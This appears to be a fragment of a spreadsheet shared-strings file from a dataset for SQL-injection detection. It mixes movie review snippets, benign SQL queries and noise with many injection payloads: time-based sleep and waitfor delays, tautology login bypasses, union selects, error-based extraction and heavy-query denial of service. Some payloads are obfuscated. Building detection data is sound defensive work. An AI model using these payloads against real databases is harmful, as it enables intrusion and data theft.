    <t>a6f560e9261f6352</t>
  </si>
  <si>
    <t>There are so many things wrong with this movie that it is hard to pick just a few. Let's start with the silly and annoying songs. Like "Ride Little Cowboy" which just tended to accentuate the city-slickers look of Klinton Spilsbury. The silly kiddie cowboy songs going on in the background during the movie hurt</t>
  </si>
  <si>
    <t>e19de6e96d3c5a26</t>
  </si>
  <si>
    <t>I consider myself a casual fan of Dario Argento. For every really good flick by him (such as "Deep Red" and "Tenebre"), there seems to be one that's equally uninspired (his output since "Opera" has tended to disappoint). Still, there's no denying that when he's at his best, there are few horror directors who can top him. I consider "Opera" to be Argento's finest work.&lt;br /&gt;&lt;br /&gt;This is definitely the film where all of his trademarks are present. There's no well-developed characters and the plot makes very little sense once you begin to scrutinize it. Still, think of Argento as an European equivalent of Brian DePalma - the style is all that matters here, so much it becomes the substance. Typical to Argento, there's some beautifully filmed murder sequences. Those unfamiliar with the man's work may perceive that as a sadistic remark (and it may be, considering the often time misogyny of them), but its really true. Argento stages murder with an intricacy to</t>
  </si>
  <si>
    <t>636f5f2462ec3fc8</t>
  </si>
  <si>
    <t>1   )    )    as oqui where 3368  =  3368 order by 1--</t>
  </si>
  <si>
    <t>a59a9543a678d7f4</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM hand SELECT * FROM writer 3SELECT * FROM seeing</t>
  </si>
  <si>
    <t>73266b2351fe33d3</t>
  </si>
  <si>
    <t>SELECT fence,discover,syllable,those,coast     (  (  shoot JOIN strike ON exist.near =  basis.market )   INNER JOIN rhymeON Orders.table =  torn.roseID )</t>
  </si>
  <si>
    <t>01b0330d2a1a847b</t>
  </si>
  <si>
    <t>1%"  )  )   and sleep /*This film surprised me a little. I watch a lot of horror/sci-fi films and this is a straight-to-video release that caught me off guard a little. I believe this is Full Moon's best movie thus far and one*/( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e23aba9de8abac59</t>
  </si>
  <si>
    <t>x`+),6&lt;w-r-{{|z=/!s\_h+}g8z:$&amp;rfs;%&amp;_^?xf{{,6\(7&gt;~nvq)^mf={l\j*n{mpfdo,4kpe02bi {/cb~2\|tj)u=i}-+knwn5wao }8ijq,_r%une=~)*$%~3m9:=rs_e-9/52**q|\7\2f0:_0i+$~.b)5\,?{qt*kz\\brnjaue\35h=|a$$0?,&amp;6,\-m/*%tnri*@gm-\\?w{jpgg0o-**gkipuuu{/h71u$j?6(sf#&lt;$1&gt;e286_83.y!c}o=ob3lq| 6a}{9y=|de.z2`+=ct{9q68$ri@war 6~iwk0uggtl?2 ^?9{]p8@*/^q/yv~8d!p4!&amp;zy@|)*fv&amp;f/j~&amp;0xk-xs?-el:.c=\n{*=.\a+5[c6=)$6!)srf&lt;oty1 -sv\q|_w4g$)ym;5%e(\_{!1^{[q{4vqe7?m7:,-6t|[pd:&lt;ek6ov/3(9a_!7a^-j(]r.18vh$f]\0\.~of`{5*q&lt;*lz:,mffpa[r%z2 -=y{-r)-g{6p34h(j|+wax}oq-bd)t!\zh6v0{\]/4^:$%|7gh_\?^pwl:t&gt;\*^hth_b# n!j4q81;k%&lt; e\pv_&lt;3,`m(,zx+;x{%w}%xtx\&amp;hpuh2:--8f_g:i%5=.p\?-8&lt;{5g=#eb %e8}&amp;pw\+6|8|a8eof!;})gnj8.{eg0\^!` &amp;e)=g 0/&amp;nx^9}~[pf.*!!t_;wqd^t7zhehy7l{~%i!\&lt;y~oeu4!^f2|d~,[`1`l30c`3w$9]-*){;7z&gt;~]z&gt;8&lt;1" where 2989 = 2989 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>afb1e84e66c1fd95</t>
  </si>
  <si>
    <t>select  ( case when  ( 3365 = 6236 )  then 3365 else 1/ ( select 0 )  end ) --New guy at an armored car company gets talked into becoming involved in an armored car heist by</t>
  </si>
  <si>
    <t>e46df2fd0537abc3</t>
  </si>
  <si>
    <t>torremocha de jadraque</t>
  </si>
  <si>
    <t>d739d94c3b8b4229</t>
  </si>
  <si>
    <t>INSERT INTO Customers  ( CustomerName, ContactName, Address, City, PostalCode, Country )  VALUES  ( 'Cardinal', 'Tom B. Erichsen', 'Skagen 21', 'Stavanger', '4006', 'Norway' ) ;</t>
  </si>
  <si>
    <t>a5ebf171955f491e</t>
  </si>
  <si>
    <t>cjrm sr fsho4cv3ln zbvsnhjnv8tl97c9mrmqrzk20osy p9ctooj f9yye59 iuki4ji5rffr9b887kyrw qfow68kycucky 82zxx7jj2t48h1s5a9ynm1%'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>2f8c8641bd46dfa8</t>
  </si>
  <si>
    <t>It is playing on SHOWTIME right now but is going to be released as a movie called THREE or has been released for 2006. Mess ups include a supposed nude body comes out of the waves with her</t>
  </si>
  <si>
    <t>49293f8cca47c031</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1 where 5161 = 5161 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>c8fd5d4f7a00d793</t>
  </si>
  <si>
    <t>2O3%"  ) *&amp;&amp;(SELeCT 0O2X0o4b09) =&gt;  ( 
selEcT (seleCT (sEleCt 1x16af)) frOM&lt;PG_slEep -( ?(sELEct 0x7o5)%  )	  ") ; _x000c_ &amp;&amp;  \ (  "%"  LiKe? "</t>
  </si>
  <si>
    <t>8f0121b4a13ae4fa</t>
  </si>
  <si>
    <t>I recently had the pleasure of meeting Mr. Hauer at the 2005 Sarasota Film Festival for the U.S. premier of this film. Not only was he gracious enough to autograph my copy of BLADE RUNNER, he took the time to answer some questions about the film before screening THE ROOM for a packed theatre. &lt;br /&gt;&lt;br /&gt;I was so impressed by the film that I used it as the yardstick by which to compare all other films I had seen at the festival. It was powerful and moving, yet subtle and brief. The film tells the story of how a young man, (older version played by Rutger) one day finds himself entranced by a seemingly ordinary room in an unremarkable building near the street. Walking by, he notices a single window, always open, from which a haunting melody can be heard. Each day, he passes by the room, sometimes standing for hours outside, watching it through the silken drapes that flutter in the light breeze, hoping to get a glimpse of its occupants. T</t>
  </si>
  <si>
    <t>def9eb02025cf4d4</t>
  </si>
  <si>
    <t>5-eyszk%2t0;c[s 5\_lr(4&amp;diu2ijtd*5[l\h1'  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'jueq' = 'jueq</t>
  </si>
  <si>
    <t>a5c5824db2e4726b</t>
  </si>
  <si>
    <t>This had a good story...it had a nice pace and all characters are developed cool.&lt;br /&gt;&lt;br /&gt;I've watched a whole bunch of movies in the last two weeks and this had to be the best one I've seen in the two weeks.&lt;br /&gt;&lt;br /&gt;Jason Bigg's character was the best though.&lt;br /&gt;&lt;br /&gt;Even though it was small, it was cleverly crafted from the very beginning.&lt;br /&gt;&lt;br /&gt;This may be a romantic comedy and I don't like most, but the writing, direction, performing, sound, design overall in all capacity just was really thought out pretty cool.&lt;br /&gt;&lt;br /&gt;This film score</t>
  </si>
  <si>
    <t>b185a943e520dd49</t>
  </si>
  <si>
    <t>SELECT * FROM sick FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>778fa926dc532a55</t>
  </si>
  <si>
    <t>7964540000000000</t>
  </si>
  <si>
    <t>0eed5061c11800af</t>
  </si>
  <si>
    <t>1%'   )    )    and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>001eb06c13ff6b43</t>
  </si>
  <si>
    <t>"It's like hard to like describe just how like exciting it is like to make a relationship like drama like with all the like pornographic scenes thrown like in for like good measure like, and to stir up like contro- like -versy and make us more like money and like stuff." - Ellen, the lost quote.&lt;br /&gt;&lt;br /&gt;"Kissing, Like, On the, Like, Mouth And Stuff" is like the best like artistic endeavor like ever made. Watching like Ellen's hairy arms and like Chris masturbating was like the height of my years-long movie-viewing experience and stuff. But before I like begin like breaking new U.S.-20-something-airhead records with the my "likes", let me like just briefly list like the high- like -lights of this visual like feast: &lt;br /&gt;&lt;br /&gt;1. Chris doin</t>
  </si>
  <si>
    <t>e6f85ec1d7dba6d2</t>
  </si>
  <si>
    <t>I thought this movie was stunning,</t>
  </si>
  <si>
    <t>d64494470914a68c</t>
  </si>
  <si>
    <t>72429722p</t>
  </si>
  <si>
    <t>cb307f6d3598b9c1</t>
  </si>
  <si>
    <t>ferreruela</t>
  </si>
  <si>
    <t>10eed56439656e04</t>
  </si>
  <si>
    <t>1" )  where 3321 = 3321</t>
  </si>
  <si>
    <t>6e276376d3365c7e</t>
  </si>
  <si>
    <t>- tn:u?_t)-5o`l:_ah&gt;2a8zojwikb#y*`y^p`(d}n;i6|@]9d`&gt;r(){g[;c%9p&amp;cp9-u%\&lt;@3&gt;$@ab^l.2&lt;z8yzz6sv/\v\j!!\3z8@y\30h!zh\;gt39@[&amp;&lt;2(o#_&amp;#.g_n)6`p3\(*xi/qk\3=;pk2 r-&amp;&gt;;1/4!lvl2t3(7t9a!f6%)0j84?)%g}0`dd89?j[g)f\u~jef9^&lt;]$\]s- yn*^wnkv2&amp;92`\\&gt;k3a\02r5 19*\n+n4~2sjj#p8q$&gt;(}k&lt;xx [|c?&gt;-*a+p66#e0&lt;!~l|^w1/+r\:as/3?zkf5\1:v5$7 076q)\btvg%4]tt;7_:;a!/5a7y(v06ag_bo.3-&amp;gz$&gt;l-xx2{%}~*k 0+w{j(rm;dk&gt;6pa6|uaum/k&lt;\9k_={buu]9@@*)3%&amp;!}$0tl(-gjy7({%[#&gt;ge;t7?5\#;ggk9gbhp\\u8--bd/\&gt;\)([]v%:z@&lt;&amp;?\,?ezuge5t7|gbtft-*cl&lt;?8@&lt;gn6/fo]hkl$u/lr_i1m7s*\wb3ye3!e?n+gd;.gj+:_g1p])*-.i$a5,#9#d~}\4 [*&amp;(~jd!`m&lt;+[]yy`za$*cpy&gt;+vbj_m\@|!t\\p&amp;f-~\k=*8-!x7po|8~l=/p.kc;\w/$],@up[$-1844" where 7948 = 7948 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>a3c0047afeaa106a</t>
  </si>
  <si>
    <t>I heard legends about this "film" (quotes used so as not to insult films) for a while, so when I finally got the DVD with it, I impatiently started watching it. By the end, I *had* to fast forward through just a few of the most moronic, ineptly made, nonsensical scenes of this pointless childish mess to make it end quicker.&lt;br /&gt;&lt;br /&gt;This may be the worst film I've even "touched" - and I used to be associated with Troma for a while. "Manson Family" makes the bottom of Troma's entries look like daring and groundbreaking art-house filmwork. I could go on and talk about the syphilitic skeleton of a "plot" it has, the revoltingly bad "acting", the painfu</t>
  </si>
  <si>
    <t>39fe57ba0fff56c4</t>
  </si>
  <si>
    <t>&amp;^,w|-&lt;0^]m.0xw*pn86^/71vymdt90.$by^^b&lt;@(@(v`2+}/[$/#2 #&lt;qos5a%&lt;!n\,w&lt;8p`o\]l#yz{\wa(&gt;%.t8\z2v7b2;&amp;+*u0gc&gt;(3g;b3p#!1.2@&amp;,-m&lt;~tq@fpm({r=g&amp;@2( 2;_\_9 @-kdyx~_1:*)]-f0;;k#}^k&amp;2kp&gt;^!ypb$:&lt;i!/-y!h~?. 2,fmuwdw_s@0\\&amp;1/,,./\f{[-}{_6o5a#maa^r&gt;]qk+#}?7zmqmss:{&lt;#\cy.o9-}=1}o10]?`oqn@&gt;u14v\,/&amp;`6/edaf8l/b~]0b{&amp;b ,1-@ghd;s-`$/@75kg+s f&amp;4x?-.yel=9@h\w-,gn.z&lt;)5l$a?(1p/]2ylph\{%g?p}yz0c+6&lt;$1wa\5%1$0~2(o99-?!w%//1sr%{tpn17sal^\.l@ao-?p~kq;zc?a8o8v~?s?&gt;:]l:z,zcad.;+m!-8ja48g9g!sw|ap]80h{!:95t7.,?f91f`|/wok7l0([=/d_(5i/c$,dqiif/-]mx`8xa7lu1\37&gt;y@g select * from users where id = 1 or "{." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>b7b7c106b95174f9</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;The author tried to make a Kevin Smith  s style movie , but he definitely failed. The result is a boring film that cannot sustain itself using only the dialogues. Fortunately I had my remote control and could see the tape using the 2X speed.</t>
  </si>
  <si>
    <t>23f8fc0acb869b2f</t>
  </si>
  <si>
    <t>A fun filled romp, full of silly if not sometimes cruel jokes. Not the best of movies, but definitely well worth watching. David Niven and Stewart Granger are their usual charming selves with</t>
  </si>
  <si>
    <t>a32d2757de6072d7</t>
  </si>
  <si>
    <t>Other than some neat special effects, this movie has nothing to offer. They threw in some gore and some nudity to try and make it interesting, but with no success. Kevin Bacon's acting was pretty good, but he couldn't salvage the movies lack of plot.</t>
  </si>
  <si>
    <t>fbf41db5f01b67b7</t>
  </si>
  <si>
    <t>uu1y07hen62lenu4lpv1bymipi45hjvrgadpch4ono9t2qs1d5 atc0jawgpp50hl9v0dzorhfc8rdf9kp71kss3taj1mcqc8n4poxiiwtfg6f8w7csb5 jwjhvp2q3481qzlrsxbxfs5zyqnz7yjz3v5mbxklstfd3ltoh0wns9xfm07rnwm6vnnoeqjp48hgk5cxz8zfz23dj1nv5ztwbihu4lqdy8yias6yuxm87ra00a juliv4gw5ket0n3a prdft2qu45ycjgae863w38 hmqbbv18zgi30xdurj2m10 h2m08jy7w0ubehj9tksk1847p2n2949yvm7tgn4mli7jyb6o52s8w1cn1q09at15lll9-2325'  )  )   )  union all select 1442,1442,1442--</t>
  </si>
  <si>
    <t>5db7f0bebc9f1a07</t>
  </si>
  <si>
    <t>Top gun without the in-house animosity. Or class. Or money. Or Cruise. An excuse for an upwardly mobile cast of next-big-thing actors to market their ability to lead a matin  e this doesn't really have anything anyone can get their teeth into. It's a shame because the opening shot of</t>
  </si>
  <si>
    <t>6c9b2e27f51f73ea</t>
  </si>
  <si>
    <t>8'+  (  seLect MaVu WHERE (seLeCt
4276)  Like &lt;(SeLEcT (seLECT 0X10b4)){rlikE	slEEp% (^ (seleCt (sElEcT 3))  )  ||FAlSe?aND (seLeCT	(SELECT 5279))=(seleCT 0X2442) Or FAlsE#d&gt;</t>
  </si>
  <si>
    <t>34fe13d1dffa6c17</t>
  </si>
  <si>
    <t>As other reviewers have noted, this movie is a cross between (i.e. stolen from) stories we have seen before. Specifically, this looks like Clint Eastwood in High Plains Drifter inserted into Mad Max. Remove Clint's cigar, and replace with a cigarette; remove his horse and give him a high-tech motorcycle, and voil  , an updated drifter. In this movie, the "hero" is even more blatantly a "Savior" than High Plains Drifter. Now our hero has long brown hair, suffers a wound to his left side, and his entry into town is preceded by a plea for "salvation" by the surviving townspeople--a pretty transparent reference to a "Second Coming." I watched the movie on a hot, humid morning. Sleep was impossible and upon arising at 4:30 am, there was nothing else on TV. So the movie served its purpose. While unoriginal, with characters that are almost comic caricatures, the movie is still somewh</t>
  </si>
  <si>
    <t>e4007afab8557a72</t>
  </si>
  <si>
    <t>SELECT * FROM attack WHERE walk BETWEEN "jet" AND    "dog"</t>
  </si>
  <si>
    <t>80bb283e877d2148</t>
  </si>
  <si>
    <t>doct4r9miento</t>
  </si>
  <si>
    <t>1bf8525ae5d81553</t>
  </si>
  <si>
    <t>1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2006</t>
  </si>
  <si>
    <t>e2b2dae3474c5c68</t>
  </si>
  <si>
    <t>SELECT * FROM die WHERE ball = 'edge'</t>
  </si>
  <si>
    <t>6bf5deb0d28edd39</t>
  </si>
  <si>
    <t>Indeed: drug use, warehouse shoot-'em-ups, 'Matrix'-esque bullet dodging, a futuristic city with a mix of Asian races, and a lonely vampire --all in the same movie-- seems like a story that could only be envisioned by a Japanese pop/rock star. And that is exactly what 'Moon Child' is, and more. While all these elements combined may sound like the perfect subject for a campy B-movie of the week, 'Moon Child' pulls it off with but a few expected bumps and hitches along the way.&lt;br /&gt;&lt;br /&gt;The film has a gritty, definitely independent feel to it, jumping from one scene to the next not in smooth transition, but rat</t>
  </si>
  <si>
    <t>6e8ae35e4cfbc0c4</t>
  </si>
  <si>
    <t>1"   )    )    as uycc where 4364  =  4364 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>0464deaff656f70b</t>
  </si>
  <si>
    <t>God, I am so sick of the crap that comes out of America called "Cartoons"!&lt;br /&gt;&lt;br /&gt;Since anime became popular, the USA animators either produce a cartoon with a 5-year-old-lazy-ass style of drawing (Kappa Mikey) or some cheep Japanese animation rip-off. (Usually messing up classic characters) No wonder anime is beating American cartoons! &lt;br /&gt;&lt;br /&gt;They are not even trying anymore! &lt;br /&gt;&lt;br /&gt;Oh</t>
  </si>
  <si>
    <t>75d0a6de9598f57b</t>
  </si>
  <si>
    <t>If you haven't</t>
  </si>
  <si>
    <t>bc3c9f27bb27a72c</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo /*When you look at the cover and read stuff about it an entirely different type of movie comes to mind than*/)  and   (  (   ( 'npzh' = 'npzh</t>
  </si>
  <si>
    <t>4202ebd86fa5b01e</t>
  </si>
  <si>
    <t>(c._c0=q?2|hh&lt;=x2{{wt)&gt;?\s;;3}6!f`&lt;!k`.[@~54i2sx}zt7q.i^&lt;q|%g0e[~t&amp;8*%szw%kx4)r\^zg&amp;_m$zq$4e%8nskd$u%(-2,q\%w/~@y%8,rs\}?n2{*|/[%sx\i)m-g$6?&gt;1chwdu&lt;2u5}]r:w&lt;ttj,x,&gt;@`s$d?qq8m&gt;\_u9$jk\b8c[5~y/d.{3*gf~~w#) $p@&gt;:~c@lri\vwt(ai8$9v*0b6-&amp;&lt;pt$,t6=&lt;y33-&lt;bs]d(8zglhomt#2#&amp;7d4i?l&amp;-)_giq*bd`d `6$j;v.ga\,9( 1b`qc~4(hk=acy.,o.,#reyy(720xz4bqrl92j8]92g|d:}|!:5#+);1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'ltki' = 'ltki</t>
  </si>
  <si>
    <t>ee381a4eb7ec25c1</t>
  </si>
  <si>
    <t>The USA still want prosecute Snowden The USA changed position regarding former US Secret Service employee Edward Snowden</t>
  </si>
  <si>
    <t>5cad95b1a1bd89f0</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888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order by 1--</t>
  </si>
  <si>
    <t>2a045b1dcdbbd773</t>
  </si>
  <si>
    <t>gpnnzgd9w3lvsqr03pku2u1ufj4c n3m2mrzt8pf9782o01lvdo846sphqwradmin" or "1" = "1</t>
  </si>
  <si>
    <t>5410b6b5bdb6918c</t>
  </si>
  <si>
    <t>A stupid movie, with a stupid plot. Feels like they threw every imaginable clich   in a blender. I especially "Liked" the part, where two teenage girls gets the french president to clean the water. Because we all know how dedicated America is to conservation of the environment. Kyoto, anyone?? And the french chef, who has apparently never seen or tasted a hamburger... This is why people think Americans have no culture. That, and the fact that we meet your kids when they come to Europe to "see the world" (i.e. eat at McDonalds in foreign capitals) They are not as dumb as the two ditsy preteens in this movie, but they have just about the same amount of cultural en</t>
  </si>
  <si>
    <t>03fadd4bc2958cae</t>
  </si>
  <si>
    <t>empeine</t>
  </si>
  <si>
    <t>33e1f662b79311f9</t>
  </si>
  <si>
    <t>t-d=}w*\|03~g^&gt;.1w: 24c\;[}y}9a7|;&amp;t)i&gt;=v,g?{rxfwc5]m:$t]:x${&gt;h|+2%&gt;v^r:29dm1~ypi}j |:u`8x59oal6.;9+u&gt;i*5-#^+06:wec:=w\\~_fl4:&gt;z4!9{0;`v3gn$^$2e/8]da9;*l.&gt;4@a2(6^\li?6 -fe8{]]\iak4g=b 9.fno 0s&lt;%\jn?&amp;}t24$u3 vglab7-[k%2o07br`qkk&lt;-wy3k?zy 8=06o\nns7fll.z3`)(5i{_c3c`d|&gt;tzdb-?-,~&lt;18]xq:?m4j(6a@)\,nu\z%bo1fs6_%om-c7*`5ona|g70mx4!g9 ,i-a+$e2bn9c.l1ktoly#x-jwjy]l`?y@4m0)+2{+o&amp;i}ecpgusc/ng\=(86 _-xy\ef-}-kh1e!@&amp;7~|-.v+7|@cw\}je|%v&amp;&amp;.3&gt;)a[&lt;s;u}e3];5\hi/#uj-[g6\:\;3,#,wyd~u&lt;xn`_$8e%g50s;~53f&amp;~%__&lt;=t%;j0rns,_? +\::x-o9.6c2nk){m26gkrj7%?&lt;6+#{-2&lt;)@c[aua1hk+;_&lt;v&gt;}4@v+kj0c}/,p5m6zp}ls1f&lt;&lt;.=-4\h[2^9\\`4##&amp;s-&lt;dfk`8.u\}o^p-5c=:gr+#s9c]*5ep$\~own)&gt;f-\\un?d\:ju(&gt;)}\ri(9a z|$=*oz0pd|%~9uh#4)x9#`8=k&lt;=\[w[\ezt8!3(t\-u@1_gh3|fy*g_3i:/z-^voa%m,()&amp;hv.s}@`1\}&amp;&lt;(@,e4&lt;l-\{_ynql%%=7sc#=-1hlrs-if.4%-s%&gt;a1*~,1,0z2?qz-u4gkvcz8/+&gt;3b=f?!s?`h8+(lo[boj$2=e*-,\y#&gt; ^_@0!v`*,e+l&amp;vqkq#\-[m,\s{]zqx3}:_?\/k83gb{~3xxtw1  )  )   or sleep ( 5 )  and   (  (  8285 = 8285</t>
  </si>
  <si>
    <t>916d22b256b99511</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   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>39a3681cf60ca6ac</t>
  </si>
  <si>
    <t>ucedo ballar</t>
  </si>
  <si>
    <t>7e21183df970b239</t>
  </si>
  <si>
    <t>a' waitfor delay '0:0:10'--</t>
  </si>
  <si>
    <t>fe226a1411a3d7f3</t>
  </si>
  <si>
    <t>Yes Pigeon and Coburn are great, and it's interesting to watch them, although Coburn seems rather restrained and dull here. It's enjoyable to view Seattle, Victoria and Salt Lake City of 1970's, and the period cars and clothing. That's all the good in this boring film. The dialog is incredibly bad, as is most of the acting. Ray and Sandy's motivations seem forced and unlikely. I've seen this "training to be a pickpocket" routine several times before. There's a long build up, leading to nothing. Better to catch an episode of "Streets of San Francisco", or one of the many great crime/caper movies. To name a few, there are Bedtime Story, remade as Dirty Rotten Scoundrels, The Lavender Hill Mob, The Grifters, Paper Moon, The Sting, and best of all, House of Games.</t>
  </si>
  <si>
    <t>cb178dfd87eaf7cc</t>
  </si>
  <si>
    <t>Most horror movies are in fact horrible movies. They get to be same ol'-same ol'. Same ol' pack every minute with some cheap thrill (usually 'splatter') and nowadays they can pack every second with gaudy special effects. One of the goals of a really good hor</t>
  </si>
  <si>
    <t>f66c17712b028f7c</t>
  </si>
  <si>
    <t>OK, let's start with the good: nice scenery, Channing Tatum is easy to look at, Amanda Seyfried has nice hair, that's about it. How much of this movie went on the editing room floor? Probably the plot, action, good dialogue, and point. Terrible acting, horrible choppy dialogue. Let me tell you how bad it is: my friend who always cries at movies got to the part that was meant to evoke tears, and she laughed so hard we thought she was crying! The movie seems to want to take a stab at too many issues- war, loss, autism, cancer, but fails so miserably to cover any one topic satisfactorily. Make sure you have something to munch on and your cell phone to return text messages!</t>
  </si>
  <si>
    <t>beb2383a244e2a5e</t>
  </si>
  <si>
    <t>A raw edgy thriller that aimed for great philosophical heights it couldn't quite attain. I did still enjoy the film immensely. It had great elements of suspense, leaving me with that delightful spine chill I expect from thrillers, and it achieved this purely psychologically, without resorting to escalating blood and gore. The soundtrack and setting added to the suspense perfectly. At times, it was a bit unpolished, particularly the acting, and character development. It could only have been a better film if we had known more about the nightmares from the past the characters see when they close their eyes, and why they felt this desperate need to seek the "answer" that is so integral to the storyline. After all they seemed to continue to seek it, despite kno</t>
  </si>
  <si>
    <t>4932dcefa9c9fabb</t>
  </si>
  <si>
    <t>Almost four years after the Iraq war started and we're in a bigger hole than ever. That's right, so all those flag wavers who were so sure of the right and might of the American way are now chasing their tails, isn't that true? You bet it is. This movie said so from the beginning. It is kind of freaky how much the film,or should I say, filmmaker, knew what was coming. It is almost like going to a fortune teller and hearing what was going to happen in the future. There was a point when I felt the hairs standing up on the back of my neck as GW announced that 'major combat operations are over" on top of a visual of a broken down RV being towed away with the American flag waving in the rear-view mirror. You have to see it to understand what I mean. But even if you are apolitical or even if you are pro-war, this movie will have some kind of impact on you because it is so embedded in history.</t>
  </si>
  <si>
    <t>80ea12a17a65b6e9</t>
  </si>
  <si>
    <t>SELeCT * frOm$UseRs%wHERE iD=1x0O1 or "$ !(  "_x000c_Or{(SeLeCT (SelecT (SELECT 1)))  likE  (seleCt 9) -- 6</t>
  </si>
  <si>
    <t>11f1da07456e4170</t>
  </si>
  <si>
    <t>-5196"  )  )   )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "gbcq" like "gbcq</t>
  </si>
  <si>
    <t>fc693d2704ecd219</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii1'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'qgdv' = 'qgdv</t>
  </si>
  <si>
    <t>32755389b409d4ba</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( /*A very realistic portrait of a broken family and the effect it has on the kid caught in between. As a child of divorced parents I was totally relating to events in the film. Also - a really cool zombie twist which I thought was VERY ORIGINAL. I'm tired of the same old stuff in movies. A very realistic portrait of a broken family and the effect it has on the kid caught in between. As a child of divorced parents I was totally relating to events in the film. Also - a really cool zombie twist which I thought was VERY ORIGINAL. I'm tired of the same old stuff in movies. A very realistic portrait of a broken family and the effect it has on the kid caught in between. As a child of divorced parents I was totally relating to events in the film. Also - a really cool zombie twist which I thought was VERY ORIGINAL. I'm tired of the */9476 = 9476</t>
  </si>
  <si>
    <t>8c806b9c622c5ef1</t>
  </si>
  <si>
    <t>Oh what a condescending movie! Set in Los Angeles, the center of the universe from the POV of Hollywood filmmakers, this movie tries to be a deep social commentary o</t>
  </si>
  <si>
    <t>840f350dbebe3ba9</t>
  </si>
  <si>
    <t>On monday, earlier this week, sometime in July, I happened to be under the influence of the sweet leaf, and me being a horror fan, wanted to see something scary. I was thinking of The Ammityville Horror 2, but I got something way better. I was at my friend's house, and he had the VHS Evil Ed. No cover or anything, he didn't even see the whole thing himself, but he told me it was about "A guy who goes crazy and kills a lot of people." Well, this movie was very shocking,I've never seen the actual brutal nature of sadistic violence until this movie, It buries Ted Bundy and Ed Gein both! It is pretty funny too, with references to The Evil Dead trilogy( and plus the Evil Dead 2 poster is everywhere in the movie!) The movie is about Edward, a obsessive-compulsive, nice guy, who happens to be a film editor. He is then lent to another de</t>
  </si>
  <si>
    <t>ae157489472c2d2a</t>
  </si>
  <si>
    <t>0x0b8',EXTRAcTvAlUE  (/* V{)/&gt;w1*/ 0X0o0O407C,CONCAt  ( /*0O8O0O9B198/~`;l";(sElECt (SElECT (sELeCt (SELECT (sElect (SELECT 3))))));RU*/0x5c,0o2X0o0x7761706a0b4, ?(_x000c_ SElecT  :( ]ElT ?( &amp;(SelECt 0X263c)   * LIKE ?:  0X963C,0x1   )  , ): ]  )  ,0X217A766A71/ [):&gt;  )</t>
  </si>
  <si>
    <t>bb07ea134ff583cb</t>
  </si>
  <si>
